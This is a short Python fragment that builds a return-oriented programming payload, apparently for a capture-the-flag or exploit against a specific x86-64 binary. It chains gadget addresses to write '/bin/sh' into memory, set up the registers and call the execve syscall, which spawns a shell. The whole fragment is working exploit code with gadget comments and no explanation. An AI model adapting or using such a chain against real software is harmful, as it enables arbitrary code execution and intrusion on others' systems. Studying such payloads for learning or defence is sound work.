payload = p64(0x401efe)
#0x0000000000401efe: pop rbx; pop r14; pop rbp; ret; 
payload += p64(0x426163)+p64(0x80)+p64(0x0)+p64(0x4027ca)
# 0x00000000004027ca: mov qword ptr [rbx + 0x60], r14; add rsp, 8; pop rbx; pop r12; pop r13; pop r14; pop r15; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x401efe)
# 0x0000000000401efe: pop rbx; pop r14; pop rbp; ret; 
payload += p64(0x426010)+p64(0x68662f6e69622f)+p64(0x0)+p64(0x4027ca)
# 0x00000000004027ca: mov qword ptr [rbx + 0x60], r14; add rsp, 8; pop rbx; pop r12; pop r13; pop r14; pop r15; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x426070)+p64(0x402ddf)
# 0x0000000000402ddf: pop rax; pop rbp; ret; 
payload += p64(0x36b25fd8)+p64(0x0)+p64(0x401553)
# 0x0000000000401553: add edx, dword ptr [rax - 0x366ffe15]; ret; 
payload += p64(0x401f00)
# 0x0000000000401f00: pop rsi; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x402ddf)
# 0x0000000000402ddf: pop rax; pop rbp; ret; 
payload += p64(0x3b)+p64(0x0)+p64(0x40aaf3)
# 0x000000000040aaf3: syscall; 
payload += b''
